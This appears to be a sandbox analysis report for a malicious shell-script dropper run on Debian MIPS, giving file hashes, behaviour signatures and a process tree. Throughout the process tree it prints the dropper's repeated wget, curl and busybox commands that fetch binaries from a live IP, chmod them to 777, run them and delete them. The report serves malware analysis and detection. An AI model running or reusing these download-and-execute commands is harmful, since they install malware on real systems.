Analysis
-
max time kernel
58s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 04:36
Static task
static1
Behavioral task
behavioral1
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
-
Size
10KB
-
MD5
3dd5c19ec5fe98baa364142d535458dd
-
SHA1
07c95352a7b1f0aa31bea494cd8e2e4f6dfab78f
-
SHA256
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb
-
SHA512
81bcbab2896b757cdebbc6b90b866f6a591c375036fd0043391e2b28b69a7d3fdb2471e023cdf9a613e4e8c0ad008231e4089365151a7e6249a8825b5eb7a479
-
SSDEEP
192:sUA5CiAJnvavrYnXpapai2b66+SeKLDsvrYnXZ+i2b66SSe+dUA5CiKnv1:sUA5CiAJnv/apmHRSUA5CiKnv1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 763 chmod 971 chmod 923 chmod 929 chmod 860 chmod 899 chmod 743 chmod 812 chmod 941 chmod 792 chmod 866 chmod 935 chmod 947 chmod 893 chmod 977 chmod 983 chmod 749 chmod 872 chmod 818 chmod 878 chmod 905 chmod 953 chmod 965 chmod 911 chmod 917 chmod 959 chmod 841 chmod 887 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 744 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 750 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 765 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 793 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX 813 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 819 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs 843 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 861 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk 867 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR 873 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 879 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi 888 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 894 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 900 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 906 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 912 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX 918 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs 924 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 930 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk 936 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR 942 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 948 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi 954 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 960 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 966 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 972 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 978 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 984 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 949 rm 815 wget 817 busybox 820 rm 944 wget 946 busybox 816 curl 819 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 945 curl 948 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl File opened for modification /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs curl File opened for modification /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 curl File opened for modification /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo curl File opened for modification /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR curl File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 curl File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 curl File opened for modification /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX curl File opened for modification /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk curl File opened for modification /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR curl File opened for modification /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 curl File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY curl File opened for modification /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi curl File opened for modification /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 curl File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl File opened for modification /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 curl File opened for modification /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 curl File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX curl File opened for modification /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs curl File opened for modification /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk curl
Processes
-
/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:741
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:748
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:758
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:786
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:811
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:817
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:819
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:835
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:859
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:865
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:871
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:877
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:886
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:892
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:898
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:904
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:910
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:916
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:922
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:928
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:934
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
